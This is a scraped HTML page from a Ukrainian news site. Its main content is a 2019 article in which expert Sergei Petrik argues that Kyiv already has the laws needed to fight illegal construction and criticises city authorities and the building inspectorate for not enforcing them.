href="https://enovosty.com/news_abroad/full/1710-rossiya-xochet-izbezhat-nakazaniya-za-prestupleniya-v-mezhdunarodnyx-vooruzhennyx-konfliktax-zakonoproekt-putina">Россия хочет избежать наказания за преступления в международных вооруженных конфликтах- законопроект Путина</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4778200"> <span class="postDate">21:26</span> <a class="postTitle" href="https://enovosty.com/news-finance/full/1710-ebrr-ozhidaet-rekordnogo-pritoka-investicij-v-ukrainu-v-etom-godu">ЕБРР ожидает рекордного притока инвестиций в Украину в этом году</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4778197"> <span class="postDate">21:13</span> <a class="postTitle" href="https://enovosty.com/news_society/full/1710-v-polshe-pytayutsya-spasti-ukrainca-na-kotorogo-upal-samoubijca">В Польше пытаются спасти украинца, на которого упал самоубийца</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4778194"> <span class="postDate">20:53</span> <a class="postTitle" href="https://enovosty.com/news_abroad/full/1710-v-rf-podsudimye-vskryli-sebe-veny-i-pererezali-gorlo-v-sude">В РФ подсудимые вскрыли себе вены и перерезали горло в суде</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4778187"> <span class="postDate">20:43</span> <a class="postTitle" href="https://enovosty.com/news_society/full/1710-v-vatikane-predstavili-pervye-sovremennye-elektronnye-chetki-foto">В Ватикане представили первые современные электронные четки (ФОТО)</a><br /> </span><div class="postFields"></div></div><div class="post_news"> <span id="post-4778180"> <span class="postDate">20:19</span> <a class="postTitle" href="https://enovosty.com/news_society/full/1710-v-dnepre-obstrelyali-mercedes-voditel-pogib-na-meste">В Днепре обстреляли Mercedes: водитель погиб на месте</a><br /> </span><div class="postFields"></div></div><div class="cls"></div><a class="readMore" href="https://enovosty.com/news/">Все новости &raquo;</a></div><div class="links_bal"></div>  </div><div style="width:474px; border:none;" id="center"><div style="width:474px;overflow: visible;" class="wiget simple_category"><style type="text/css" media="screen">@import url(https://enovosty.com/wp-content/themes/eizvestia/css/singlePage.min.css?v=1);</style><style>#center .wiget.singlePost .plot{float:right;margin:5px 0 5px 10px;width:250px}</style><div class="wiget simple singlePost" style="float: left; overflow: hidden; height:auto; border:none; padding:0; margin-bottom:10px;" > <div itemscope itemtype="https://schema.org/NewsArticle" class="post _ga1_on_" style="margin:0; padding:0; " id="post-4778294"><meta itemscope itemprop="mainEntityOfPage" itemType="https://schema.org/WebPage" itemid="https://enovosty.com/news_kiev/full/1810-sergej-petrik-rasskazal-o-merax-borby-s-nezakonnym-stroitelstvom"/><article style="font-size:12pt;"><h1 itemprop="headline" id="postTitle">Сергей Петрик рассказал о мерах борьбы с незаконным строительством</h1><div class="breadcrumb"><a href="https://enovosty.com/">Главная</a> <span>&raquo;</span> <a href="https://enovosty.com/news/">Последние новости</a> <span>&raquo;</span> <a href="https://enovosty.com/news/news_kiev">Новости Киева</a> <span>&raquo;</span> Сергей Петрик рассказал о мерах борьбы с незаконным строительством</div><time datetime="2019-10-18T16:18:27+03:00"><span id="date">Новости Киева, 16:18:27 </span></time><div class="border">&nbsp;</div><table class="social"><tr><td><div class="swp_social_panel swp_horizontal_panel swp_flat_fresh swp_default_full_color swp_individual_full_color swp_other_full_color scale-100 scale-" data-min-width="1100" data-float-color="#ffffff" data-float="none" data-float-mobile="none" data-transition="slide" ><div class="nc_tweetContainer swp_share_button swp_facebook" data-network="facebook"><a class="nc_tweet swp_share_link" rel="nofollow noreferrer noopener" target="_blank" href="https://www.facebook.com/share.php?u=https%3A%2F%2Fenovosty.com%2Fnews_kiev%2Ffull%2F1810-sergej-petrik-rasskazal-o-merax-borby-s-nezakonnym-stroitelstvom" data-link="https://www.facebook.com/share.php?u=https%3A%2F%2Fenovosty.com%2Fnews_kiev%2Ffull%2F1810-sergej-petrik-rasskazal-o-merax-borby-s-nezakonnym-stroitelstvom"><span class="iconFiller"><span class="spaceManWilly"><i class="sw swp_facebook_icon"></i><span class="swp_share">Поделиться</span></span></span><span class="swp_count">1</span></a></div><div class="nc_tweetContainer swp_share_button swp_twitter" data-network="twitter"><a class="nc_tweet swp_share_link" rel="nofollow noreferrer noopener" target="_blank" href="https://twitter.com/intent/tweet?text=%D0%A1%D0%B5%D1%80%D0%B3%D0%B5%D0%B9+%D0%9F%D0%B5%D1%82%D1%80%D0%B8%D0%BA+%D1%80%D0%B0%D1%81%D1%81%D0%BA%D0%B0%D0%B7%D0%B0%D0%BB+%D0%BE+%D0%BC%D0%B5%D1%80%D0%B0%D1%85+%D0%B1%D0%BE%D1%80%D1%8C%D0%B1%D1%8B+%D1%81+%D0%BD%D0%B5%D0%B7%D0%B0%D0%BA%D0%BE%D0%BD%D0%BD%D1%8B%D0%BC+%D1%81%D1%82%D1%80%D0%BE%D0%B8%D1%82%D0%B5%D0%BB%D1%8C%D1%81%D1%82%D0%B2%D0%BE%D0%BC&url=https%3A%2F%2Fenovosty.com%2Fnews_kiev%2Ffull%2F1810-sergej-petrik-rasskazal-o-merax-borby-s-nezakonnym-stroitelstvom&via=enovosty" data-link="https://twitter.com/intent/tweet?text=%D0%A1%D0%B5%D1%80%D0%B3%D0%B5%D0%B9+%D0%9F%D0%B5%D1%82%D1%80%D0%B8%D0%BA+%D1%80%D0%B0%D1%81%D1%81%D0%BA%D0%B0%D0%B7%D0%B0%D0%BB+%D0%BE+%D0%BC%D0%B5%D1%80%D0%B0%D1%85+%D0%B1%D0%BE%D1%80%D1%8C%D0%B1%D1%8B+%D1%81+%D0%BD%D0%B5%D0%B7%D0%B0%D0%BA%D0%BE%D0%BD%D0%BD%D1%8B%D0%BC+%D1%81%D1%82%D1%80%D0%BE%D0%B8%D1%82%D0%B5%D0%BB%D1%8C%D1%81%D1%82%D0%B2%D0%BE%D0%BC&url=https%3A%2F%2Fenovosty.com%2Fnews_kiev%2Ffull%2F1810-sergej-petrik-rasskazal-o-merax-borby-s-nezakonnym-stroitelstvom&via=enovosty"><span class="swp_count swp_hide"><span class="iconFiller"><span class="spaceManWilly"><i class="sw swp_twitter_icon"></i><span class="swp_share">Tвитнуть</span></span></span></span></a></div><div class="nc_tweetContainer swp_share_button swp_linkedin" data-network="linkedin"><a class="nc_tweet swp_share_link" rel="nofollow noreferrer noopener" target="_blank" href="https://www.linkedin.com/cws/share?url=https%3A%2F%2Fenovosty.com%2Fnews_kiev%2Ffull%2F1810-sergej-petrik-rasskazal-o-merax-borby-s-nezakonnym-stroitelstvom" data-link="https://www.linkedin.com/cws/share?url=https%3A%2F%2Fenovosty.com%2Fnews_kiev%2Ffull%2F1810-sergej-petrik-rasskazal-o-merax-borby-s-nezakonnym-stroitelstvom"><span class="swp_count swp_hide"><span class="iconFiller"><span class="spaceManWilly"><i class="sw swp_linkedin_icon"></i><span class="swp_share">Поделиться</span></span></span></span></a></div></div></td></tr></table><div class="printmail"> <a href="https://enovosty.com/print?printajax=4778294" style="padding-right:3px;"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/print.png" width="18" height="18" alt="Печать" title="Печать"></a> <a href="#" id="mailto"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/mailto.png" width="26" height="18" alt="Отправить на почту" title="Отправить на почту"></a><div class="mailwin" style="display:none;"><span class="link-close" title="Закрыть"><span class="close">Закрыть</span></span><input type="text" onclick="if (this.value == 'Введите e-mail') this.value = ''" onblur="if (this.value == '') this.value = 'Введите e-mail'" name="mail" value="Введите e-mail" /><button>Отправить</button></div><p class="al_loadingImage" style="top:4%;">&nbsp;</p></div><div class="border">&nbsp;</div><b><p>Мэр Киева Виталий Кличко призвал премьер-министра Алексея Гончарука способствовать совершенствованию нормативной базы для эффективной борьбы с самовольным строительством.</p></b> <div style="text-align:center;"><img width="460" height="348" src="https://enovosty.com/wp-content/uploads/2019/10/petrik_03-460x348.jpg" class="attachment-news-image size-news-image wp-post-image" alt="" srcset="https://enovosty.com/wp-content/uploads/2019/10/petrik_03.jpg 460w, https://enovosty.com/wp-content/uploads/2019/10/petrik_03-112x85.jpg 112w, https://enovosty.com/wp-content/uploads/2019/10/petrik_03-300x227.jpg 300w, https://enovosty.com/wp-content/uploads/2019/10/petrik_03-52x38.jpg 52w, https://enovosty.com/wp-content/uploads/2019/10/petrik_03-100x75.jpg 100w" sizes="(max-width: 460px) 100vw, 460px" /></div> <p>С вопросом относительно влияния усовершенствования нормативной базы на борьбу с самовольным строительством “Экономические Новости” обратились за эксклюзивным комментарием к известному эксперту Сергею Петрику, информирует <a class="inform" href="https://enovosty.com/news">enovosty.com/news</a>.</p><p><a class="tag" href="https://enovosty.com/tag/sergej-petrik" target="_blank">Сергей Петрик</a> сообщает, что решить проблему с самовольным строительством законодательство позволяет уже прямо сейчас</p><p>&#171;Просто смешно, когда целый мэр столицы и, более того, целый премьер-министр проводят совещания, и мэр призывает премьера содействовать совершенствованию нормативной базы для борьбы с каким-то «скворечником». Да, это варварская уродливая надстройка на историческом здании в центре Киева. Но решить проблему законодательство позволяет прямо сейчас.</p><p>Если Кабмин и лично премьер-министр занимаются этим вопросом, то зачем тогда тратить деньги на содержание Государственной архитектурно-строительной инспекции (ГАСИ)? Это ее функции — обнаружить подобное нарушение. Дальше инициатора надстройки обязывают восстановить за свой счет аутентичный вид здания. Поскольку утверждают, что все разрешения на данную конкретную надстройку имеются, то виновные, подписавшие их (чьи это чиновники — из горадминистрации, из Минкультуры?) наказываются по всей строгости закона. Если по-хорошему не получается, то суд заставит. Это займет очень непродолжительное время.</p><p class="readlink"><strong>Читайте:</strong> <a target="_blank" href="https://enovosty.com/news_society/full/3004-sergej-petrik-rasskazal-kak-sovremennye-mobilnye-prilozheniya-oblegchayut-zhizn-kievlyanam-i-gostyam-stolicy" >Сергей Петрик рассказал, как современные мобильные приложения облегчают жизнь киевлянам и гостям столицы</a></p><p>Когда-то я обнаружил, что за ночь в подземном переходе на Крещатике, ближайшем от горадминистрации, появились киоски. И тут же встретил сотрудника администрации, отвечающего в то время за надзор над такими объектами. Он говорит, мол, сам поражаюсь такой наглости, будем искать, чье это. Спустя какое-то время говорит: оказывается, хозяином является&#8230; (и называет влиятельную фамилию). Короче, дали киоскам какое-то время подзаработать, а потом снесли, как положено (думаю, перебазировались в другой переход, отлично заработав на Крещатике). Так происходит борьба с незаконными МАФами, которые мэр обещал искоренить все пять лет. Чего ему не хватает? Какого еще совершенствования нормативной базы?</p><p>В данном случае со «скворечником» создается впечатление, что или нас этой ерундой отвлекают от чего-то важного, или продолжается банальный пиар в стиле, столь любимом городской властью. В частности, по борьбе с самовольным строительством. Четыре года назад застройщик построил в Десятинном переулке то количество этажей, которое было предусмотрено проектом и отвечало вполне конкретным требованиям памятникоохранного законодательства (оно недвусмысленное и не требует совершенствования), а затем замахнулся надстраивать внеплановые. С ним городская власть договорилась, а в сопровождении журналистов разрушать надстройку молотом приезжал сам секретарь Киеврады.</p><p>С другим застройщиком, по улице Гончара, замахнувшимся также на лишние этажи в буферной зоне Софии Киевской, у городской власти не получается договориться. Но и строительство заморожено, пока тянутся суды.</p><p class="readlink"><strong>Читайте:</strong> <a target="_blank" href="https://enovosty.com/news-finance/full/1902-oplata-proezda-v-transporte-s-pomoshhyu-sms-i-e-bileta-yavlyaetsya-proryvom-sergej-petrik" >Оплата проезда в транспорте с помощью SMS и е-билета является прорывом, - Сергей Петрик</a></p><p>В общем, законы у нас есть. Просто на «самодеятельность», уродующую облик столицы, закрывают глаза. Начиная с кондиционеров и застекленных балконов, которые запросто можно заставить демонтировать в соответствии со всеми нормами, и заканчивая проблемой, на которую действительно надо обратить внимание. А это целые жилые комплексы, которые строятся без документов на землю или начало строительства. Самый одиозный, уже арестованный застройщик, построил 45 таких домов. Что с ними делать? Увы, придется легализовать, иначе это проблема станет покруче, чем скандал «Элиты-Центра». В разрабатываемой градостроительной документации эти жилые дома, фактически построенные самовольно, думаю, в большинстве случаев будут учитываться. Денег их разрушать нет, а людей обозлить против власти можно запросто.</p><p>Другое дело, если явно в зеленой зоне какой-то застройщик самовольно начнет строить пару девятиэтажек и даже распродаст квартиры, пользуясь неграмотностью и доверчивостью граждан. Есть риск, что, пока дома не построены, их снесут. Люди рискуют!</p><p>Проводилось исследование компании Monitor.Estate и Украинского клуба недвижимости. Проанализировали 208 объектов жилищного строительства в Киеве с запланированным сроком ввода в эксплуатацию в 2019-2022 годах. Оказалось, что 152 из них содержат риски (в некоторых присутствуют оба): 107 жилых домов возводят на землях с ненадлежащим целевым назначением; 101 объект возводят без полученных разрешений на выполнение строительных работ. Спрашивается, чем занимается ГАСИ, если ее функции по борьбе с мелкими надстройками взял на себя премьер-министр?</p><p>Законы есть, их надо выполнять&#187;, &#8212; сообщает эксперт</p><div class="tptn_counter" style="color:white;" id="tptn_counter_4778294"><script type="text/javascript" src="https://enovosty.com/wp-content/plugins/top-10/top-10-counter.js.php?top_ten_id=4778294&amp;_wpnonce=4f8aa7c466"></script></div><div class="swp-content-locator"></div><br /><span itemprop="publisher" itemscope itemtype="https://schema.org/Organization"><div itemprop="logo" itemscope itemtype="https://schema.org/ImageObject"><img itemprop="url image" style="display:none;" src="https://enovosty.com/wp-content/themes/eizvestia/img/srclogo.png"/> <meta itemprop="width" content="280"> <meta itemprop="height" content="55"></div><meta itemprop="name" content="Экономические новости" /><meta itemprop="telephone" content="+380958836229"><meta itemprop="address" content="Киев"></span><span itemprop="author" itemscope itemtype="https://schema.org/Person"><meta itemprop="name" content="Оксана Ельченко" /></span><meta itemprop="datePublished" content="2019-10-18T16:18:27+03:00"/><meta itemprop="dateModified" content="2019-10-18T16:24:08+03:00"/><meta itemprop="genre" content="Новости Киева"/><meta itemprop="description" content="Мэр Киева Виталий Кличко призвал премьер-министра Алексея Гончарука способствовать совершенствованию нормативной базы для эффективной борьбы с самовольным строительством."/><div itemprop="image" itemscope itemtype="https://schema.org/ImageObject" rel="nofollow"><span itemprop="url" itemprop="image" content="https://enovosty.com/wp-content/uploads/2019/10/petrik_03-460x348.jpg"><span itemprop="image" content="https://enovosty.com/wp-content/uploads/2019/10/petrik_03-460x348.jpg"><meta itemprop="width" content="460"><meta itemprop="height" content="348"> </span></span></div></article></div> <div class="postFooter" style="padding:0;"><span id="authorName" style="margin-right: 25px;float: left;"><span id="label">Автор: Оксана Ельченко</span></span><div id="posttags" style="max-width: 360px;float: left;margin:10px 0 10px 7px; clear: both;">ТЕГИ: <a href="https://enovosty.com/tag/sergej-petrik" rel="tag">Сергей Петрик</a></div><div style="font: 11px/16px Arial,Verdana,sans-serif;float: right;">Посещений: 35</div><div class="voteBox" > </div><br /><p style="color:#a3a3a3;font-size:12px;clear:both;">Если Вы заметили орфографическую ошибку, выделите её мышью и нажмите Ctrl+Enter</p><div class="border">&nbsp;</div><table class="social"><tr><td><div class="swp_social_panel swp_horizontal_panel swp_flat_fresh swp_default_full_color swp_individual_full_color swp_other_full_color scale-100 scale-" data-min-width="1100" data-float-color="#ffffff" data-float="none" data-float-mobile="none" data-transition="slide" ><div class="nc_tweetContainer swp_share_button swp_facebook" data-network="facebook"><a class="nc_tweet swp_share_link" rel="nofollow noreferrer noopener" target="_blank" href="https://www.facebook.com/share.php?u=https%3A%2F%2Fenovosty.com%2Fnews_kiev%2Ffull%2F1810-sergej-petrik-rasskazal-o-merax-borby-s-nezakonnym-stroitelstvom" data-link="https://www.facebook.com/share.php?u=https%3A%2F%2Fenovosty.com%2Fnews_kiev%2Ffull%2F1810-sergej-petrik-rasskazal-o-merax-borby-s-nezakonnym-stroitelstvom"><span class="iconFiller"><span class="spaceManWilly"><i class="sw swp_facebook_icon"></i><span class="swp_share">Поделиться</span></span></span><span class="swp_count">1</span></a></div><div class="nc_tweetContainer swp_share_button swp_twitter" data-network="twitter"><a class="nc_tweet swp_share_link" rel="nofollow noreferrer noopener" target="_blank" href="https://twitter.com/intent/tweet?text=%D0%A1%D0%B5%D1%80%D0%B3%D0%B5%D0%B9+%D0%9F%D0%B5%D1%82%D1%80%D0%B8%D0%BA+%D1%80%D0%B0%D1%81%D1%81%D0%BA%D0%B0%D0%B7%D0%B0%D0%BB+%D0%BE+%D0%BC%D0%B5%D1%80%D0%B0%D1%85+%D0%B1%D0%BE%D1%80%D1%8C%D0%B1%D1%8B+%D1%81+%D0%BD%D0%B5%D0%B7%D0%B0%D0%BA%D0%BE%D0%BD%D0%BD%D1%8B%D0%BC+%D1%81%D1%82%D1%80%D0%BE%D0%B8%D1%82%D0%B5%D0%BB%D1%8C%D1%81%D1%82%D0%B2%D0%BE%D0%BC&url=https%3A%2F%2Fenovosty.com%2Fnews_kiev%2Ffull%2F1810-sergej-petrik-rasskazal-o-merax-borby-s-nezakonnym-stroitelstvom&via=enovosty" data-link="https://twitter.com/intent/tweet?text=%D0%A1%D0%B5%D1%80%D0%B3%D0%B5%D0%B9+%D0%9F%D0%B5%D1%82%D1%80%D0%B8%D0%BA+%D1%80%D0%B0%D1%81%D1%81%D0%BA%D0%B0%D0%B7%D0%B0%D0%BB+%D0%BE+%D0%BC%D0%B5%D1%80%D0%B0%D1%85+%D0%B1%D0%BE%D1%80%D1%8C%D0%B1%D1%8B+%D1%81+%D0%BD%D0%B5%D0%B7%D0%B0%D0%BA%D0%BE%D0%BD%D0%BD%D1%8B%D0%BC+%D1%81%D1%82%D1%80%D0%BE%D0%B8%D1%82%D0%B5%D0%BB%D1%8C%D1%81%D1%82%D0%B2%D0%BE%D0%BC&url=https%3A%2F%2Fenovosty.com%2Fnews_kiev%2Ffull%2F1810-sergej-petrik-rasskazal-o-merax-borby-s-nezakonnym-stroitelstvom&via=enovosty"><span class="swp_count swp_hide"><span class="iconFiller"><span class="spaceManWilly"><i class="sw swp_twitter_icon"></i><span class="swp_share">Tвитнуть</span></span></span></span></a></div><div class="nc_tweetContainer swp_share_button swp_linkedin" data-network="linkedin"><a class="nc_tweet swp_share_link" rel="nofollow noreferrer noopener" target="_blank" href="https://www.linkedin.com/cws/share?url=https%3A%2F%2Fenovosty.com%2Fnews_kiev%2Ffull%2F1810-sergej-petrik-rasskazal-o-merax-borby-s-nezakonnym-stroitelstvom" data-link="https://www.linkedin.com/cws/share?url=https%3A%2F%2Fenovosty.com%2Fnews_kiev%2Ffull%2F1810-sergej-petrik-rasskazal-o-merax-borby-s-nezakonnym-stroitelstvom"><span class="swp_count swp_hide"><span class="iconFiller"><span class="spaceManWilly"><i class="sw swp_linkedin_icon"></i><span class="swp_share">Поделиться</span></span></span></span></a></div></div></td></tr></table><div class="printmail" style="float: right; width: 54px; margin-top: 8px;"> <a href="https://enovosty.com/print?printajax=4778294" style="padding-right:3px;"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/print.png" width="18" height="18" alt="Печать" title="Печать"></a> <a href="#" id="mailto"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/mailto.png" width="26" height="18" alt="Отправить на почту" title="Отправить на почту"></a><div class="mailwin" style="display:none;"><span class="link-close" title="Закрыть"><span class="close">Закрыть</span></span><input type="text" onclick="if (this.value == 'Введите e-mail') this.value = ''" onblur="if (this.value == '') this.value = 'Введите e-mail'" name="mail" value="Введите e-mail" /><button>Отправить</button></div><p class="al_loadingImage" style="top:4%;">&nbsp;</p></div><div class="border">&nbsp;</div><link rel="stylesheet" type="text/css" media="screen" href="https://enovosty.com/wp-content/plugins/ajax-login/login.css?v=2" /><div id="popup-login"><div class="login"><div class="caption"><span class="title">Вход на сайт</span><a class="link-close" href="#"><span class="close">Закрыть</span></a></div><form name="loginform" id="loginform" action="#" method="post"><p class="error"></p><p class="message"></p><img id="al_loadingImage" alt="Загрузка..." src="https://enovosty.com/wp-content/plugins/ajax-login/al_loading.gif"/><p><label for="user_login">Логин (email):</label><input type="text" name="user_login" id="user_login" class="input" value="" size="20" /></p><p><label for="user_pass">Пароль:</label><input type="password" name="pwd" id="user_pass" class="input" value="" size="20" /></p><div class="login-footer"><p class="forgetmenot"><input name="rememberme" type="checkbox" id="rememberme" value="forever" /><label for="rememberme">Запомнить меня</label></p><p class="submit"><input type="button" onClick="sendLogin('https://enovosty.com/wp-content/plugins/ajax-login/login.php', jQuery('#loginform').serialize());return false;" name="wp-submit" id="wp-submit" value="Войти" />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<a target="_blank" href="/register" id="wp-register">Зарегистрироваться</a></p></div><fieldset><legend>или</legend><div class="soclogin"><style type="text/css">#wp-social-login-connect-with{clear:both;display:block;font-size:13px;font-weight:normal;padding-top:6px}#wp-social-login-connect-options{padding:4px 0}#wp-social-login-connect-options a{text-decoration:none;margin-right:5px}#wp-social-login-connect-options img{border:0 none;width:22px}.wsl_connect_with_provider{}</style><div class="wp-social-login-widget"><div class="wp-social-login-connect-with">Войти с помощью:</div><div class="wp-social-login-provider-list"><a rel="nofollow" href="https://enovosty.com/authtonews.php?action=wordpress_social_authenticate&#038;mode=login&#038;provider=Facebook&#038;redirect_to=http%3A%2F%2Fenovosty.com%2Fnews_kiev%2Ffull%2F1810-sergej-petrik-rasskazal-o-merax-borby-s-nezakonnym-stroitelstvom" title="Connect with Facebook" class="wp-social-login-provider wp-social-login-provider-facebook" data-provider="Facebook"><img alt="Facebook" title="Connect with Facebook" src="https://enovosty.com/wp-content/plugins/wordpress-social-login/assets/img/32x32/wpzoom/facebook.png" /></a><a rel="nofollow" href="https://enovosty.com/authtonews.php?action=wordpress_social_authenticate&#038;mode=login&#038;provider=Google&#038;redirect_to=http%3A%2F%2Fenovosty.com%2Fnews_kiev%2Ffull%2F1810-sergej-petrik-rasskazal-o-merax-borby-s-nezakonnym-stroitelstvom" title="Connect with Google" class="wp-social-login-provider wp-social-login-provider-google" data-provider="Google"><img alt="Google" title="Connect with Google" src="https://enovosty.com/wp-content/plugins/wordpress-social-login/assets/img/32x32/wpzoom/google.png" /></a><a rel="nofollow" href="https://enovosty.com/authtonews.php?action=wordpress_social_authenticate&#038;mode=login&#038;provider=Twitter&#038;redirect_to=http%3A%2F%2Fenovosty.com%2Fnews_kiev%2Ffull%2F1810-sergej-petrik-rasskazal-o-merax-borby-s-nezakonnym-stroitelstvom" title="Connect with Twitter" class="wp-social-login-provider wp-social-login-provider-twitter" data-provider="Twitter"><img alt="Twitter" title="Connect with Twitter" src="https://enovosty.com/wp-content/plugins/wordpress-social-login/assets/img/32x32/wpzoom/twitter.png" /></a></div><div class="wp-social-login-widget-clearing"></div></div> </div></fieldset></form></div></div><script type="text/javascript" src="https://enovosty.com/wp-content/plugins/ajax-login/ajaxlogin.js"></script><input style="width: auto;float: none;background: #2196F3;margin: 5px 0;padding: 0 10px;font-size: 12px;" type="button" value="Вход/Регистрация" id="addanons" name="wp-submit" onclick="get_auth()" ><style type="text/css" media="screen">@import url(/wp-content/plugins/ajax-comment-loading/css/style.css?v=8);</style><noscript>Для загрузки комментариев нужен JavaScript.</noscript><div id="comments-loading" style="display:none">Комментарии...</div><div id="comments-loaded"></div><input type="hidden" name="comments_nonce" value="f3e47ca984" id="comments_nonce" /><script type="text/javascript">document.getElementById('comments-loading').style.display = 'block';</script></div>  </div><br /><div id='div-gpt-ad-1531223757969-0' style='height:600px; width:300px;'><script>googletag.cmd.push(function() { googletag.display('div-gpt-ad-1531223757969-0'); });</script></div> <div class="mainPageWiget articles" style="overflow:visible;"><p style="height: auto;overflow: visible; font-weight: 700;font-family: arial,verdana,tahoma;margin: 0;"><a style="color:#000;font-size: 16px;" href="https://enovosty.com/articles">Аналитика</a></p><hr style="border: 1px solid #000000;"><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4778246"><div class="blockTitle"><img src="https://enovosty.com/wp-content/themes/eizvestia/img/ei_size.gif" /><a class="postTitle" href="https://enovosty.com/finance/full/1810-peregovory-ukrainy-s-mvf-o-novom-kredite-kak-budut-reshat-vopros-s-privatbankom">Переговоры Украины с МВФ о новом кредите: как будут решать вопрос с «ПриватБанком»?</a></div></div><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4778070"><div class="blockTitle"><a class="postTitle" href="https://enovosty.com/politika/full/1710-itogi-dnya-cena-korrupcionera-shkolnye-shtrafy-i-vybroshennoe-moshhnoe-pismo-trampa">Итоги дня: Цена коррупционера, школьные штрафы и выброшенное "мощное" письмо Трампа</a></div></div><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4777975"><div class="blockTitle"><a class="postTitle" href="https://enovosty.com/politika/full/1610-itogi-dnya-isterika-kremlya-pozitiv-ot-mvf-i-unikalnaya-operaciya-vsu">Итоги дня: Истерика Кремля, новшества от МВФ и уникальная операция ВСУ</a></div></div><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4777738"><div class="blockTitle"><a class="postTitle" href="https://enovosty.com/markets/full/1610-zemlyu-spekulyantam-i-oligarxam-chast-2">Землю – спекулянтам и олигархам?! Часть 2</a></div></div><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4777796"><div class="blockTitle"><a class="postTitle" href="https://enovosty.com/politika/full/1510-itogi-dnya-bolshaya-pobeda-ukrainy-minskij-proval-i-skandalnyj-propagandist-v-kieve">Итоги дня: Большая победа Украины, минский провал и скандальный пропагандист в Киеве</a></div></div><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4777621"><div class="blockTitle"><a class="postTitle" href="https://enovosty.com/ekonomika/full/1510-strasti-po-tranzitu-stanet-li-anbandling-naftogaza-spaseniem-dlya-otechestvennoj-gts">Страсти по транзиту: станет ли анбандлинг «Нафтогаза» спасением для отечественной ГТС?</a></div></div><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4777313"><div class="blockTitle"><a class="postTitle" href="https://enovosty.com/politika/full/1110-itogi-dnya-ekonomicheskie-peremeny-epoxalnyj-etap-dlya-pcu-i-spasenie-mini-bankov">Итоги дня: Экономические перемены, эпохальный этап для ПЦУ и спасение мини-банков</a></div></div><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4777120"><div class="blockTitle"><a class="postTitle" href="https://enovosty.com/politika/full/1010-itogi-dnya-mirovoj-rekord-zelenskogo-plan-b-po-donbassu-i-zhestkij-ultimatum-krymu-ot-kieva-i">Итоги дня: Мировой рекорд Зеленского, план "Б" по Донбассу и жесткий ультиматум Крыму от Киева</a></div></div><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4776920"><div class="blockTitle"><a class="postTitle" href="https://enovosty.com/politika/full/910-itogi-dnya-neozhidannyj-naezd-niderlandov-rasshirenie-seroj-zony-unikalnaya-raketa-ukrainy-i">Итоги дня: Неожиданный наезд Нидерландов, расширение "серой зоны" и уникальная ракета Украины</a></div></div><div class="post" onmouseover="this.className='hpost'" onmouseout="this.className='post'" id="post-4776738"><div class="blockTitle"><a class="postTitle" href="https://enovosty.com/politika/full/810-itogi-dnya-specoperaciya-s-vazhnym-svidetelem-i-kamen-po-kremlyu-ot-lukashenko">Итоги дня: Спецоперация с важным свидетелем, показания Сенцова и камень по Кремлю от Лукашенко</a></div><div class="more"><a href="https://enovosty.com/articles">Все статьи</a></div></div></div><br /><div
id='admixer_3b1188cc66144215a9bc9ecb1d9b44e9_zone_7939_sect_1082_site_1069'></div><script type='text/javascript'>admixerML.fn.push(function() {admixerML.display('admixer_3b1188cc66144215a9bc9ecb1d9b44e9_zone_7939_sect_1082_site_1069');});</script><div id="pop_video" class="six"><p class="head"><span>популярные видео</span></p><div class="caption" data-limit="6"> <div class="caption_link"><a href="javascript:void(0)" class="active" onclick="getbVideo(0)">читаемые</a>&nbsp;&nbsp;<a href="javascript:void(0)" data-rb="1" onclick="getbVideo(1)">комментируемые</a></div><div class="popular-sort"><div class="sort"><a onclick="getPopVideo(31)">месяц</a></div><div class="sort"><a class="active" onclick="getPopVideo(7)">неделю</a>&nbsp;&nbsp;|</div><div class="sort">за&#160;&#160;<a onclick="getPopVideo(1)">сутки</a>&nbsp;&nbsp;|</div></div></div> <table style="width:100%;" class="newsbody"><tr><td class="photo "><div class="aimg"><a href="https://enovosty.com/news_politics/full/1510-chto-to-poshlo-ne-tak-u-putina-v-saudovskoj-aravii-set-xoxochet-nad-strannym-video"><img width="142" height="88" alt="Что-то пошло не так у Путина в Саудовской Аравии: Сеть хохочет над странным видео" src="https://enovosty.com/wp-content/uploads/2019/10/gimn.jpg" /><span class="stopbg"></span></a><a class="title" href="https://enovosty.com/news_politics/full/1510-chto-to-poshlo-ne-tak-u-putina-v-saudovskoj-aravii-set-xoxochet-nad-strannym-video">Что-то пошло не так у Путина в Саудовской Аравии: Сеть хохочет над странным видео</a></div></td><td class="photo "><div class="aimg"><a href="https://enovosty.com/news_abroad/full/1710-v-seti-opublikovali-moment-ekstremalnogo-manevra-istrebitelya-mig-29-video"><img width="142" height="88" alt="В Сети опубликовали момент экстремального маневра истребителя МиГ-29" src="https://enovosty.com/wp-content/uploads/2019/10/624128d8b6204d5b3e6e4a4e735c2fd1-e1571252044606.jpg" /><span class="stopbg"></span></a><a class="title" href="https://enovosty.com/news_abroad/full/1710-v-seti-opublikovali-moment-ekstremalnogo-manevra-istrebitelya-mig-29-video">В Сети опубликовали момент экстремального маневра истребителя МиГ-29</a></div></td><td class="photo last"><div class="aimg"><a href="https://enovosty.com/news-auto/full/1610-gollandskie-inzhenery-sozdali-bessmertnyj-vnedorozhnik-video"><img width="142" height="88" alt="Голландские инженеры создали бессмертный внедорожник" src="https://enovosty.com/wp-content/uploads/2019/10/44090804494_ffc60d0232_b-e1571159947614.jpg" /><span class="stopbg"></span></a><a class="title" href="https://enovosty.com/news-auto/full/1610-gollandskie-inzhenery-sozdali-bessmertnyj-vnedorozhnik-video">Голландские инженеры создали бессмертный внедорожник</a></div></td></tr><tr><td 